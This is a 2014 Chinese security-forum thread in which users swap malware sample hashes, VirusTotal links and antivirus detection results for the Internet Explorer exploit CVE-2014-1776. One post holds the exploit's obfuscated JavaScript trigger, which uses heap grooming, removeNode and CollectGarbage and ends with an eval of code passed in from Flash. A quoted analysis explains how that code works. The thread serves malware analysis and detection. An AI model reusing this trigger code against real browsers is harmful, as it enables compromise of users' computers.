楼主: hx1997
收起左侧

[病毒样本] CVE-2014-1776 (14L, 24L, 34L, 40L 更新)

[复制链接]
hx1997
 楼主| 发表于 2014-5-8 08:48:26 | 显示全部楼层
newcenturysun 发表于 2014-5-7 14:13
最新发现了几个MD5 楼主能找到么
BE9C50AEC2027E2601ECE95A9B93AA89
746E6437FB8FDF5F863214C5EF5D1EFC

7E29349FCA402D5B415F30535CE6BFA9 在 40L
newcenturysun
发表于 2014-5-8 09:37:53 | 显示全部楼层
万分感谢 总算凑齐了
lh9916
发表于 2014-5-8 10:49:50 | 显示全部楼层
34楼


40楼过FEP

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
XywCloud
发表于 2014-5-8 12:22:28 | 显示全部楼层
40L样本已经采集
Dust-;羅錠
发表于 2014-5-8 12:37:41 | 显示全部楼层
hx1997 发表于 2014-5-8 08:48
https://www.virustotal.com/en/file/c4170266c2d23ee570f89803244eaec94b5b56f8ba992c7b89ec8e90bf013d0e/ ...

To Dr.Web

[drweb.com #4717391]
尘梦幽然
发表于 2014-5-8 15:32:40 | 显示全部楼层
        function dword2data(dword) {
          var d = Number(dword).toString(16);
          while (d.length < 8)
            d = '0' + d;
          return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
        }

        var g_arr = [];
        var arrLen = 0x250;
        var m_block;
        var g_mark = 1;

        function fun() {
          var CsEEuo1 = 0;
          for (CsEEuo1 = 0; CsEEuo1 < arrLen; ++CsEEuo1) {
            g_arr[CsEEuo1] = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x64\x69\x76');
          }
          var KzmQtp2 = dword2data(0x4eadc0de);
          var osLECEF3 = 0x18181818;
          while (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] < 0xd8) {
            if (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] == (0x5c / 2)) {
              KzmQtp2 += dword2data(osLECEF3 - 0x18 - 0xc);
            } else if (KzmQtp2["\x6c\x65\x6e\x67\x74\x68"] == (0xa0 / 2)) {
              KzmQtp2 += dword2data(osLECEF3 + 0x10);
            } else {
              KzmQtp2 += dword2data(0x41414141);
            }
          }
          m_block = KzmQtp2["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (0xd8 - 2) / 2);
          try {
            this["\x72\x65\x6d\x6f\x76\x65\x4e\x6f\x64\x65"](true);
          } catch (e) {}
          CollectGarbage();
          for (CsEEuo1 = 0; CsEEuo1 < (arrLen / 2); ++CsEEuo1) {
            g_arr[CsEEuo1]["\x74\x69\x74\x6c\x65"] = m_block["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, m_block["\x6c\x65\x6e\x67\x74\x68"]);
          }
          g_mark++;
        }

        var g_tmpBuf;
        var g_mk = 1;

        function oil(np) {
          if (g_mk == 1) {
            g_tmpBuf = np;
            setTimeout('oil("");', 200);
            g_mk++;
          } else {
            eval(g_tmpBuf);
          }
        }
Dust-;羅錠
发表于 2014-5-8 19:43:29 | 显示全部楼层
怎么40楼的回复无威胁呢...

Your submission has been analyzed. This file presents no threat to your system.


又分析错了?
Genes
发表于 2014-5-9 10:14:15 | 显示全部楼层
竟然发现,没有权限下载,好伤心。。
ELOHIM
发表于 2014-5-9 11:53:26 | 显示全部楼层
那个js脚本,是什么威胁?楼主。。
hx1997
 楼主| 发表于 2014-5-9 12:15:19 | 显示全部楼层
ELOHIM 发表于 2014-5-9 11:53
那个js脚本,是什么威胁?楼主。。

http://www.cyphort.com/blog/dig- ... -2014-1776-exploit/

The actual exploiting javascript code, which triggers the vulnerability, is present in the actionscript as an RC4 encrypted string. Subsequently it gets decrypted and sent to the cmmon.js via Flash's external interface. cmmon.js triggers the use-after-free vulnerability by executing an eval statement on the received string. The vulnerability allows to modify the length of a vector object, which would be impossible from within actionscript.

评分

参与人数 1人气 +1 收起 理由
ELOHIM + 1 这个加分一次!!

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-28 12:23 , Processed in 0.098624 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表